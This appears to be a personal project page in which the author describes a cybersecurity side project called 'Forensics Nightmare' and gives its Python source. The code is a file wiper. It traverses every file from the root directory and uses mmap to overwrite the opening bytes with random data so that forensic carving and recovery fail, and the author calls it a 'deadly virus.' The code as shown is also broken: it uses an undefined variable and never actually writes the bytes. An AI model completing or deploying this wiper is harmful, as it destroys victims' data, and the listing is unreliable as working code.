Cyber Security Projects
Origin
I was in an interview and they asked what I have done on the side, which hit me a huge thing I have been overlooking. I don't have any cyber security projects but have a lot of programming projects. Sure I have CTF but how much does that account for? I realize I need to add more to get more creditability.
Overview
Wanted a program that could be useful in cyber security. Just put segments together into one huge program. Kind of like TOBIAS but in cyber security.
Forensics Nightmare
Basically in forensics I learned that carving comes from magic bytes or headers from a file. I didn't want to append and it seemed there was nothing you could do to write the beginning bytes of the file until I found mmap. It could rewrite the first bytes of a file. Mix that in with a traversal and you get a deadly virus that rewrites a computer. The bytes are random so the only way to recover is to brute force guessing the correct file type and from that you still have a loss as I didn't just do the first few but a good chunk.
import mmap
import random
import numpy as np
import os
import subprocess
def main():
#subproccess.run('pip3 install mmap')
path = "/"
#we shall store all the file names in this list
filelist = []
print("starting up")
for root, dirs, files in os.walk(path): # Finds all the files on the system
for file in files:
#append the file name to the list
filelist.append(os.path.join(root,file))
print("loading......")
if True:
for f in filelist: # Iterates through the files and rewrites the beginning bytes
try:
file_obj = open(f, mode='r+')
mmap_obj = mmap.mmap(file_obj.fileno(),length=0,access=mmap.ACCESS_WRITE,offset=0)
file_size = os.path.getsize(filepath)
startint = 50
endint = 150
if file_size < 100:
endint = file_size
startint = file_size / 2
rep_len = random.randint(startint, endint)
randbytes = np.random.bytes(rep_len)
except:
pass
main()
TBD
Last updated
Was this helpful?